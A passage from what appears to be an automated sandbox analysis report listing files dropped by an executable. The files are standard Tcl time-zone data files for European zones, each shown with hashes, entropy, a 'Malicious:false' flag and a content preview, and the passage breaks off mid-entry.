                                                                                                                                                                                                                              SHA-512:07AC42F0635DF01CC0AFD13F9668B143D4943BA0E4C377D254B5AF034D9DDBAB77BA813187E9AB73D2EEAD86EBAA26DC15599FD74FC82EEF287F5A6AB9C01635
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/London) {.. {-9223372036854775808 -75 0 LMT}.. {-3852662325 0 0 GMT}.. {-1691964000 3600 1 BST}.. {-1680472800 0 0 GMT}.. {-1664143200 3600 1 BST}.. {-1650146400 0 0 GMT}.. {-1633903200 3600 1 BST}.. {-1617487200 0 0 GMT}.. {-1601848800 3600 1 BST}.. {-1586037600 0 0 GMT}.. {-1570399200 3600 1 BST}.. {-1552168800 0 0 GMT}.. {-1538344800 3600 1 BST}.. {-1522533600 0 0 GMT}.. {-1507500000 3600 1 BST}.. {-1490565600 0 0 GMT}.. {-1473631200 3600 1 BST}.. {-1460930400 0 0 GMT}.. {-1442786400 3600 1 BST}.. {-1428876000 0 0 GMT}.. {-1410732000 3600 1 BST}.. {-1396216800 0 0 GMT}.. {-1379282400 3600 1 BST}.. {-1364767200 0 0 GMT}.. {-1348437600 3600 1 BST}.. {-1333317600 0 0 GMT}.. {-1315778400 3600 1 BST}.. {-1301263200 0 0 GMT}.. {-1284328800 3600 1 BST}.. {-1269813600 0 0 GMT}.. {-1253484000 3600 1 BST}.. {-1238364000 0 0 GMT}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):191
                                                                                                                                                                                                                              Entropy (8bit):4.920751023999728
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/So3vXHAIgoq82yHRL/yQavQLHKQX9J8QahCv:SlSWB9vsM3ymhS2HAIgoh26N/y1QzKQt
                                                                                                                                                                                                                              MD5:E4A8C25756D6C5D2073A51D2B54E3A0C
                                                                                                                                                                                                                              SHA1:4A24667ADC9BD31E8CB298BE3787C12301C3F1C8
                                                                                                                                                                                                                              SHA-256:8C0486A5B235E8B01069420976E1B8D08D77A4BEF587203AF1B68D7B5333546E
                                                                                                                                                                                                                              SHA-512:F3593C3B75C9DA931FB39BC2054EB9691C3A544A74F871425169C3244040D6D060510741FE1E352A1E59F53E5A585307D434A0D7C9D159D065717E78C807787C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Brussels)]} {.. LoadTimeZoneFile Europe/Brussels..}..set TZData(:Europe/Luxembourg) $TZData(:Europe/Brussels)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8517
                                                                                                                                                                                                                              Entropy (8bit):3.8326167134909177
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:k5m01LdXKc0TJp+bwS274elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOn:+DaNVLSs41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                              MD5:63263380F57B756A1DFA3796E4188CD3
                                                                                                                                                                                                                              SHA1:8EEE707AC4FEA1C098C81AC2D289A46239121A5E
                                                                                                                                                                                                                              SHA-256:5337C9843C56DEEC6B91C4468C76EC1C896E80421B72B583B69DE5579063E09A
                                                                                                                                                                                                                              SHA-512:ACA4830020715C471741E27EB2292ACF002D2CD7EDCD1061978B64967EB447F61AA095F960D8A75A01B9B87558D83FF409F30BDACA83E063024F1E2381FA64C4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Madrid) {.. {-9223372036854775808 -884 0 LMT}.. {-2177452800 0 0 WET}.. {-1631926800 3600 1 WEST}.. {-1616889600 0 0 WET}.. {-1601168400 3600 1 WEST}.. {-1585353600 0 0 WET}.. {-1442451600 3600 1 WEST}.. {-1427673600 0 0 WET}.. {-1379293200 3600 1 WEST}.. {-1364774400 0 0 WET}.. {-1348448400 3600 1 WEST}.. {-1333324800 0 0 WET}.. {-1316390400 3600 1 WEST}.. {-1301270400 0 0 WET}.. {-1284339600 3600 1 WEST}.. {-1269820800 0 0 WET}.. {-1026954000 3600 1 WEST}.. {-1017619200 0 0 WET}.. {-1001898000 3600 1 WEST}.. {-999482400 7200 1 WEMT}.. {-986090400 3600 1 WEST}.. {-954115200 0 0 WET}.. {-940208400 3600 0 CET}.. {-873079200 7200 1 CEST}.. {-862621200 3600 0 CET}.. {-842839200 7200 1 CEST}.. {-828320400 3600 0 CET}.. {-811389600 7200 1 CEST}.. {-796870800 3600 0 CET}.. {-779940000 7200 1 CEST}.. {-765421200 3600 0 CET}.. {-74849
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8724
                                                                                                                                                                                                                              Entropy (8bit):3.816380386871747
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:KAGvi2GmkwwnpH74elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZN:KLsww141sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                              MD5:9B09D6EED8F23BAFFB62929C0115E852
                                                                                                                                                                                                                              SHA1:4AEF15333C73C2836C09D818FD0E20440D7C4780
                                                                                                                                                                                                                              SHA-256:C5C240BAAECE8235D1FBDD251C1A67CB2D2FC8195DD5BBE37FF9CFF0445FCDA2
                                                                                                                                                                                                                              SHA-512:43AA3492BD335A290C6EFEE275B47EA18E544199E37A9BBAE2E350D42BDFF42F0E9ED461A4BB1824CA33F84A90D4060906844A3E22DA49C9821E4CB460832D6E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Malta) {.. {-9223372036854775808 3484 0 LMT}.. {-2403478684 3600 0 CET}.. {-1690765200 7200 1 CEST}.. {-1680487200 3600 0 CET}.. {-1664758800 7200 1 CEST}.. {-1648951200 3600 0 CET}.. {-1635123600 7200 1 CEST}.. {-1616896800 3600 0 CET}.. {-1604278800 7200 1 CEST}.. {-1585533600 3600 0 CET}.. {-1571014800 7200 1 CEST}.. {-1555293600 3600 0 CET}.. {-932432400 7200 1 CEST}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812588400 7200 1 CEST}.. {-798073200 3600 0 CET}.. {-781052400 7200 1 CEST}.. {-766717200 3600 0 CET}.. {-750898800 7200 1 CEST}.. {-733359600 3600 0 CET}.. {-719456400 7200 1 CEST}.. {-701917200 3600 0 CET}.. {-689209200 7200 1 CEST}.. {-670460400 3600 0 CET}.. {-114051600 7200 1 CEST}.. {-103168800 3600 0 CET}.. {-81997200 7200 1 CEST}.. {-71715600 3600 0 CET}.. {-50547600 7200 1
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):190
                                                                                                                                                                                                                              Entropy (8bit):4.959733196757503
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV1AYKjG5XHAIgoq2AYKjo0ARL/yQausWILMFJ8QaC:SlSWB9vsM3ymrAdjGJHAIgorAdjo0ANn
                                                                                                                                                                                                                              MD5:C1844961691214F6E6DF6487788A7758
                                                                                                                                                                                                                              SHA1:6D08E9FB7B8602A80622148BFACD9676F45F0E2B
                                                                                                                                                                                                                              SHA-256:6136C3CFA4A767E7C9DDA23A283AD98B72E9868F192E6A8E3BFE6396F6989BD1
                                                                                                                                                                                                                              SHA-512:B2D1EA51AC5B34792AC02820A9D60FD41F3B91AB6505896476FCB0DC339B8DC1DE9E2C89A7627F69E16247661AE8040D789FFD2F8F1CD59F243B57C4845B450F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Helsinki)]} {.. LoadTimeZoneFile Europe/Helsinki..}..set TZData(:Europe/Mariehamn) $TZData(:Europe/Helsinki)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2177
                                                                                                                                                                                                                              Entropy (8bit):3.9354590900153172
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:K8cVnR7xhuHJkminzaVV04v3TfdGY3kNmneVuNlh000sGpde:5mnRtEpkmiSV3A8qcN
                                                                                                                                                                                                                              MD5:9C10EAE9FA0DE192C5FD4F76E12606F0
                                                                                                                                                                                                                              SHA1:AFD5650410EC3E6ED564A8B2ABF91709D090B4AD
                                                                                                                                                                                                                              SHA-256:8C95EA696EA578DEF726502AC181AF475A676030878F56B4E2D667757BBD1C49
                                                                                                                                                                                                                              SHA-512:3B9ED6B68858485B9A46A0863B7D9D3C1E4C5BBA269457F24A9A12C274F0F9B35E63D8C25EB53E7200DB57DD35ACCB7FD7D8AB005FEE2C4D7FC6E72E8CF57194
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Minsk) {.. {-9223372036854775808 6616 0 LMT}.. {-2840147416 6600 0 MMT}.. {-1441158600 7200 0 EET}.. {-1247536800 10800 0 MSK}.. {-899780400 3600 0 CET}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-804646800 10800 0 MSD}.. {354920400 14400 1 MSD}.. {370728000 10800 0 MSK}.. {386456400 14400 1 MSD}.. {402264000 10800 0 MSK}.. {417992400 14400 1 MSD}.. {433800000 10800 0 MSK}.. {449614800 14400 1 MSD}.. {465346800 10800 0 MSK}.. {481071600 14400 1 MSD}.. {496796400 10800 0 MSK}.. {512521200 14400 1 MSD}.. {528246000 10800 0 MSK}.. {543970800 14400 1 MSD}.. {559695600 10800 0 MSK}.. {575420400 14400 1 MSD}.. {591145200 10800 0 MSK}.. {606870000 14400 1 MSD}.. {622594800 10800 0 MSK}.. {631141200 10800 0 MSK}.. {670374000 7200 0 EEMMTT}.. {670377600 10800 1 EEST}.. {
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):178
                                                                                                                                                                                                                              Entropy (8bit):4.9089012087310095
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVtEXc4o3vXHAIgoquEXeRL/yQauPMFBx6QazEXcov:SlSWB9vsM3ymzESPHAIgozEON/ySRpEB
                                                                                                                                                                                                                              MD5:2015CF8BBEEE12AF0D9C82FD2E246C72
                                                                                                                                                                                                                              SHA1:062BFFBB266C3EBB5776A509DDB7A6044C82B864
                                                                                                                                                                                                                              SHA-256:9DF16BB1C26100635DC4CB1DF409B0FA7B139C22BF09574ED337EE244CA3C546
                                                                                                                                                                                                                              SHA-512:FD3479588D4F3B84CF6C8B8A5DB1AB3BFA0A87CA2FFADB4FEBBBB25711C77963BE7CD0D1DA5ED985D729F39C5B44E8CBD429F1E2DA813DF26272D66CAE4F425A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Paris)]} {.. LoadTimeZoneFile Europe/Paris..}..set TZData(:Europe/Monaco) $TZData(:Europe/Paris)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2430
                                                                                                                                                                                                                              Entropy (8bit):3.942836780611272
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:7fnjazk7e+LxhuHJkvVineTeCTU50x0Y7:7fnjazk7eoEpkvVieTeCTUax0Y7
                                                                                                                                                                                                                              MD5:4547D47E9364ACAFB2A4BEE52D04BFBB
                                                                                                                                                                                                                              SHA1:1E7F964692F81D49AEAF581FE70AD22D4E36226B
                                                                                                                                                                                                                              SHA-256:31F9C3C2F17B3EE4FA6D9EE6A86BF407AC0377DE4D666C65E86CE5AC591F829F
                                                                                                                                                                                                                              SHA-512:7F1D7C80A1BF611D5440EEF9085DA6CDED86B5EF4C2737C105640030E5AA998A0951182E72DC224190A25DA8846CDE856A78EBAA8876AA0B18B1CBCADBB060FF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Moscow) {.. {-9223372036854775808 9017 0 LMT}.. {-2840149817 9017 0 MMT}.. {-1688265017 9079 0 MMT}.. {-1656819079 12679 1 MST}.. {-1641353479 9079 0 MMT}.. {-1627965079 16279 1 MDST}.. {-1618716679 12679 1 MST}.. {-1596429079 16279 1 MDST}.. {-1593820800 14400 0 MSD}.. {-1589860800 10800 0 MSK}.. {-1542427200 14400 1 MSD}.. {-1539493200 18000 1 +05}.. {-1525323600 14400 1 MSD}.. {-1491188400 7200 0 EET}.. {-1247536800 10800 0 MSD}.. {354920400 14400 1 MSD}.. {370728000 10800 0 MSK}.. {386456400 14400 1 MSD}.. {402264000 10800 0 MSK}.. {417992400 14400 1 MSD}.. {433800000 10800 0 MSK}.. {449614800 14400 1 MSD}.. {465346800 10800 0 MSK}.. {481071600 14400 1 MSD}.. {496796400 10800 0 MSK}.. {512521200 14400 1 MSD}.. {528246000 10800 0 MSK}.. {543970800 14400 1 MSD}.. {559695600 10800 0 MSK}.. {575420400 14400 1 MSD}.. {591145200 10
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):179
                                                                                                                                                                                                                              Entropy (8bit):4.7873368289068905
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq85GKLlXHAIgNwMGKLZRRL/yQatHefeWFKYGKL8n:SlSWB9vsM3yZdL1HAIgGMdLZRN/y3HeA
                                                                                                                                                                                                                              MD5:BE82205480617CF07F76BA0DF06C95BC
                                                                                                                                                                                                                              SHA1:46D2D8D9FE4FB570C2A09BC809B02C8960F9601F
                                                                                                                                                                                                                              SHA-256:FC93B7516933EDFDC211AC0822EE88BF7ACAD1C58A0643B15294F82EB0F14414
                                                                                                                                                                                                                              SHA-512:F490A70053A6011D80FB0A4E96D2871BFEEB168690E21C4EC31F2F5C0E24A67C706528C81322A1D48E71242F0FFA277550192925FDE5B1F34BFCB308290E11FC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Nicosia)]} {.. LoadTimeZoneFile Asia/Nicosia..}..set TZData(:Europe/Nicosia) $TZData(:Asia/Nicosia)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):179
                                                                                                                                                                                                                              Entropy (8bit):4.910647918749938
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/y+YF3vXHAIgoq8yFRRL/yQasWJAQahyuv:SlSWB9vsM3ymhVoPHAIgoh6N/yI7Fv
                                                                                                                                                                                                                              MD5:242748F361AD524CD8E288BEE8611E19
                                                                                                                                                                                                                              SHA1:A636A544BB54851185E2BE83DAC69C813B824827
                                                                                                                                                                                                                              SHA-256:C84E9C0D22059573079211CBF487072CAB95C14B5ECEFB596CF1F594ABD3458C
                                                                                                                                                                                                                              SHA-512:404B272D0C6B70332052601EA65C0F7AE71C12F62D19FD3010BBA6FB25E4F2F95BB9E5F295D8494CBADB1AE9C7F833C42382AE7488317EA6F0C20E60B63BEFE8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Berlin)]} {.. LoadTimeZoneFile Europe/Berlin..}..set TZData(:Europe/Oslo) $TZData(:Europe/Berlin)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9152
                                                                                                                                                                                                                              Entropy (8bit):3.8506895725632746
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:fySTO1C+4qoMYOKDBb0S274elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdi:fdp+3Ss41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                              MD5:9CAF8C5C5AF630E7F782C0480DD786E7
                                                                                                                                                                                                                              SHA1:9FBEF9EEDD8BAFB48B17E3AC388CFEF8DCD10CB0
                                                                                                                                                                                                                              SHA-256:AE61491C4A587F56426A9F2118E31060276F2B0231E750C461781577551CA196
                                                                                                                                                                                                                              SHA-512:F809744BB597184A2815758A27B6A07C515C65DB96CFFB3625FD059DEBBF05EE903E999483B3459C7C8D3991824746F8530CD1378F8A63B1F54F60CFACE9F89B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Paris) {.. {-9223372036854775808 561 0 LMT}.. {-2486592561 561 0 PMT}.. {-1855958961 0 0 WET}.. {-1689814800 3600 1 WEST}.. {-1680397200 0 0 WET}.. {-1665363600 3600 1 WEST}.. {-1648342800 0 0 WET}.. {-1635123600 3600 1 WEST}.. {-1616893200 0 0 WET}.. {-1604278800 3600 1 WEST}.. {-1585443600 0 0 WET}.. {-1574038800 3600 1 WEST}.. {-1552266000 0 0 WET}.. {-1539997200 3600 1 WEST}.. {-1520557200 0 0 WET}.. {-1507510800 3600 1 WEST}.. {-1490576400 0 0 WET}.. {-1470618000 3600 1 WEST}.. {-1459126800 0 0 WET}.. {-1444006800 3600 1 WEST}.. {-1427677200 0 0 WET}.. {-1411952400 3600 1 WEST}.. {-1396227600 0 0 WET}.. {-1379293200 3600 1 WEST}.. {-1364778000 0 0 WET}.. {-1348448400 3600 1 WEST}.. {-1333328400 0 0 WET}.. {-1316394000 3600 1 WEST}.. {-1301274000 0 0 WET}.. {-1284339600 3600 1 WEST}.. {-1269824400 0 0 WET}.. {-1253494800 3
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):190
                                                                                                                                                                                                                              Entropy (8bit):4.910162937111088
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/sUE2tovXHAIgoq8sUE2oAovRL/yQazKIGl1/yQ0:SlSWB9vsM3ymhrE2tSHAIgohrE2LovNK
                                                                                                                                                                                                                              MD5:52C36955D6BD1D9FE9CB64822D04B6DB
                                                                                                                                                                                                                              SHA1:D5FF82EC486409E6FB314AD5ACE608577C9632CF
                                                                                                                                                                                                                              SHA-256:B87630FF459DE07EB16CD0C2452660772E3FFC4EEB8419EA77A013B6F63A5900
                                                                                                                                                                                                                              SHA-512:ABA49D3F05A41A4982600E4DA5C225D8994251F447401EE6FE8478E008BCD5D41C057034185B5CFF805634D571F3CC98EFE98093ABC8E6271351E11A4DA1E7AD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Belgrade)]} {.. LoadTimeZoneFile Europe/Belgrade..}..set TZData(:Europe/Podgorica) $TZData(:Europe/Belgrade)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8038
                                                                                                                                                                                                                              Entropy (8bit):3.8240363895915914
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:Kr9+neXAS274elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZhltlh:KnASs41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                              MD5:828134FA1263FEFA2B06A8B2F075F564
                                                                                                                                                                                                                              SHA1:4B332DE6E0855F8B9517F7098A3FB439671FC349
                                                                                                                                                                                                                              SHA-256:5D3AFED5C1B07C6C6635D6BDEB28A0FB4D11A61F25F26C91227B2254BE5F4AA0
                                                                                                                                                                                                                              SHA-512:9AB1462CDBD7F13F0CECDCCC2D91A85D8C0576B71508F935D26638C25ED023CF8FF4BA4FFDA402B308E6142B135D1B9D88700A519DBE2381E8E945329A5354F7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Prague) {.. {-9223372036854775808 3464 0 LMT}.. {-3786829064 3464 0 PMT}.. {-2469401864 3600 0 CET}.. {-1693706400 7200 1 CEST}.. {-1680483600 3600 0 CET}.. {-1663455600 7200 1 CEST}.. {-1650150000 3600 0 CET}.. {-1632006000 7200 1 CEST}.. {-1618700400 3600 0 CET}.. {-938905200 7200 1 CEST}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796777200 3600 0 CET}.. {-781052400 7200 1 CEST}.. {-777862800 7200 0 CEST}.. {-765327600 3600 0 CET}.. {-746578800 7200 1 CEST}.. {-733359600 3600 0 CET}.. {-728517600 0 1 GMT}.. {-721260000 0 0 CET}.. {-716425200 7200 1 CEST}.. {-701910000 3600 0 CET}.. {-684975600 7200 1 CEST}.. {-670460400 3600 0 CET}.. {-654217200 7200 1 CEST}.. {-639010800 3600 0 CET}.. {283993200 3600 0 CET}.. {291776400 7200 1 CEST}.. {307501200 3600 0 CET}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7658
                                                                                                                                                                                                                              Entropy (8bit):3.7750218768791806
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:eq+cEpkjXkSV385aNlKkUpvBeRF+iDlKSdkwSMTHkB2vwz59F06Kgr/y/rYjlBK0:ePWjUS7ivBeRF+W35Syrwl9h5j
                                                                                                                                                                                                                              MD5:0D3C919F60081388524BD5DB22E6904B
                                                                                                                                                                                                                              SHA1:6691EAB901C8B57D2F2693120A45A67799D05FCB
                                                                                                                                                                                                                              SHA-256:8B64A42BAFD90F9255CACFDBAC603D638DD7C18DC27249F9C9B515E1DA634424
                                                                                                                                                                                                                              SHA-512:62A2820B8C1C5468AC1F1BB626F9AAAD0BA1DEC5B73740F00FE4DB8CFA3F2BCF9947968E693824FC8770BA20AB962F93F7E5E345AE8A85F99CDB18E2B510308E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Riga) {.. {-9223372036854775808 5794 0 LMT}.. {-2840146594 5794 0 RMT}.. {-1632008194 9394 1 LST}.. {-1618702594 5794 0 RMT}.. {-1601681794 9394 1 LST}.. {-1597275394 5794 0 RMT}.. {-1377308194 7200 0 EET}.. {-928029600 10800 0 MSK}.. {-899521200 3600 0 CET}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796777200 3600 0 CET}.. {-795834000 10800 0 MSD}.. {354920400 14400 1 MSD}.. {370728000 10800 0 MSK}.. {386456400 14400 1 MSD}.. {402264000 10800 0 MSK}.. {417992400 14400 1 MSD}.. {433800000 10800 0 MSK}.. {449614800 14400 1 MSD}.. {465346800 10800 0 MSK}.. {481071600 14400 1 MSD}.. {496796400 10800 0 MSK}.. {512521200 14400 1 MSD}.. {528246000 10800 0 MSK}.. {543970800 14400 1 MSD}.. {559695600 10800 0 MSK}.. {575420400 14400 1 MSD}.. {591145200 10800 0 MSK}.. {6
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8813
                                                                                                                                                                                                                              Entropy (8bit):3.8168470239811736
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:hhGvC2GmkNXEq74elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZhn:hUsF41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                              MD5:C4F49446D3696301EDB339691DCB2FDB
                                                                                                                                                                                                                              SHA1:537963A77B9BE9BE6B997A812A6E6DD120F6F247
                                                                                                                                                                                                                              SHA-256:DCD2D9144507311E573568598E1FFD0E0574FB677AA0DAFC5641D80A19EB6E58
                                                                                                                                                                                                                              SHA-512:1F0A9A549FA0995C51E90AC392671E3F09744B268F1EE6A27CA7E3C41C2B02A4BA0F98369BE40BA482FBA1FED8F1EE712F0B3217AD86164D1AD498E369C24D76
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Rome) {.. {-9223372036854775808 2996 0 LMT}.. {-3252098996 2996 0 RMT}.. {-2403565200 3600 0 CET}.. {-1690765200 7200 1 CEST}.. {-1680487200 3600 0 CET}.. {-1664758800 7200 1 CEST}.. {-1648951200 3600 0 CET}.. {-1635123600 7200 1 CEST}.. {-1616896800 3600 0 CET}.. {-1604278800 7200 1 CEST}.. {-1585533600 3600 0 CET}.. {-1571014800 7200 1 CEST}.. {-1555293600 3600 0 CET}.. {-932432400 7200 1 CEST}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-830307600 7200 0 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-807152400 7200 0 CEST}.. {-798073200 3600 0 CET}.. {-781052400 7200 1 CEST}.. {-766717200 3600 0 CET}.. {-750898800 7200 1 CEST}.. {-733359600 3600 0 CET}.. {-719456400 7200 1 CEST}.. {-701917200 3600 0 CET}.. {-689209200 7200 1 CEST}.. {-670460400 3600 0 CET}.. {-114051600 7200 1 CEST}.. {-103168800 36
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2118
                                                                                                                                                                                                                              Entropy (8bit):3.664269700453612
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:7PvCAs6kKR6aQmF1cSNWrI+AjQnTRYZ/YF0LUdt/LkajuZbIJltiabs2Tb:7HCAs6kC6aZF1cSN4I+AjQTRYZ/YF0Lw
                                                                                                                                                                                                                              MD5:965D987F6576F66A08871697144D4CDB
